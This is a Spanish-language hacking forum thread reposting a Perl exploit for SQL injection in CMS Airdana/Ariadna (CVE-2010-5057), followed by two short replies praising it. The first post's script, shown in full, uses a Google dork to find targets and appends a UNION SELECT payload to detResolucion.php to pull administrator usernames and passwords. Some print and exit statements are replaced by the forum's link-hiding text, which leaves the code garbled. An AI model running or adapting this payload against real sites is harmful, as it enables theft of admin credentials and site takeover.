send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[Exploit] CMS Airdana SQL Injection

  • 2 Respuestas
  • 1541 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado s3cur1tyr00t

  • *
  • Underc0der
  • Mensajes: 86
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« en: Junio 25, 2012, 01:26:30 am »
EDB-ID: 12301   CVE: 2010-5057   OSVDB-ID: 63929
Author: Andrés Gómez   Published: 2010-04-19   Verified:
Exploit Code:      Vulnerable App:   N/A
   
Código: Perl
  1. use LWP::Simple;
  2. ################################################################
  3. # Malicious users may inject SQL querys into a vulnerable
  4. # application to fool a user in order to gather data from them or see sensible information.
  5. ################################################################
  6. # Solution:
  7. # $_GET = preg_replace("|([^\w\s\'])|i",'',$_GET);
  8. # $_POST = preg_replace("|([^\w\s\'])|i",'',$_POST);
  9. ################################################################
  10. my $target = $ARGV[0];
  11. unless ($target) { You are not allowed to view links. Register or Login "\n Inyector Remoto -- HYPERNETHOST &
  12. Security-Pentest -- Andres Gomez\n\n";
  13. You are not allowed to view links. Register or Login "\ Dork: allinurl: detResolucion.php?tipodoc_id=\n";
  14. You are not allowed to view links. Register or Login "\nEjemplo Ejecucion = AriadnaCms.pl
  15. http://www.sitio.extension/path/\n" ; You are not allowed to view links. Register or Login 1; }
  16. $sql =
  17. "detResolucion.php?tipodoc_id=33+and+1=0+union+select+concat(0x7365637572697479,adm_nombre,0x3a,0x70656e74657374,adm_clave)+from+administrador--";
  18. $final = $target.$sql;
  19. $contenido = get($final);
  20. You are not allowed to view links. Register or Login "\n\n[+] Pagina Web: $target\n\n";
  21. if ($contenido =~/security(.*):pentest(.*)/) {
  22. You are not allowed to view links. Register or Login "[-] Datos extraidos con exito:\n\n";
  23. You are not allowed to view links. Register or Login "[+] Usuario = $1\n";
  24. You are not allowed to view links. Register or Login "[+] Password = $2\n";
  25. } else {
  26. You are not allowed to view links. Register or Login "[-] No se obtuvieron datos\n\n";
  27. You are not allowed to view links. Register or Login 1;
  28. }
  29. You are not allowed to view links. Register or Login "\n[ñ] Escriba exit para salir de la aplicacion\n";
  30. You are not allowed to view links. Register or Login 1;
« Última modificación: Junio 25, 2012, 05:50:36 am por Pr0ph3t »

Desconectado Pr0ph3t

  • *
  • Underc0der
  • Mensajes: 443
  • Actividad:
    0%
  • Reputación 0
  • © Underc0de Team
    • Ver Perfil
  • Skype: thebrowfc
« Respuesta #1 en: Junio 25, 2012, 05:37:47 am »
Muy bueno andres, gracias ;)
Twitter: @The_Pr0ph3t
pr0ph3t@hotmail.es

Desconectado hdbreaker

  • *
  • Underc0der
  • Mensajes: 412
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
    • Ver Perfil
    • Security Signal
    • Email
  • Skype: hdbreaker96
  • Twitter: @SecSignal
« Respuesta #2 en: Junio 25, 2012, 04:46:39 pm »
Buen aporte! ya casi nadie codea sus propias herramientas! felicitaciones!

Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo

 

¿Te gustó el post? COMPARTILO!



vBulletin 5.0.0 Beta 11 - 5.0.0 Beta 28 - SQL Injection

Iniciado por morodog

Respuestas: 1
Vistas: 1648
Último mensaje Junio 09, 2013, 12:05:31 pm
por ANTRAX
SQL Injection - Joomla módulo "com_fireboard"

Iniciado por M5f3r0

Respuestas: 0
Vistas: 1505
Último mensaje Agosto 16, 2013, 01:43:18 am
por M5f3r0
[Curso] SQL Injection desde 0 - Union based y Blind Boolean Based.

Iniciado por M5f3r0

Respuestas: 8
Vistas: 7911
Último mensaje Abril 21, 2017, 04:36:34 am
por M5f3r0
Mysql injection avanzada: "doble query/error based"

Iniciado por q3rv0

Respuestas: 2
Vistas: 2214
Último mensaje Agosto 30, 2012, 04:26:01 am
por andrewtwo
Exploit para Apache Struts (ejecución remota de comandos) [Tomcat]|CVE2017-5638

Iniciado por Eschiclers

Respuestas: 9
Vistas: 2753
Último mensaje Marzo 23, 2017, 03:57:38 pm
por zoro248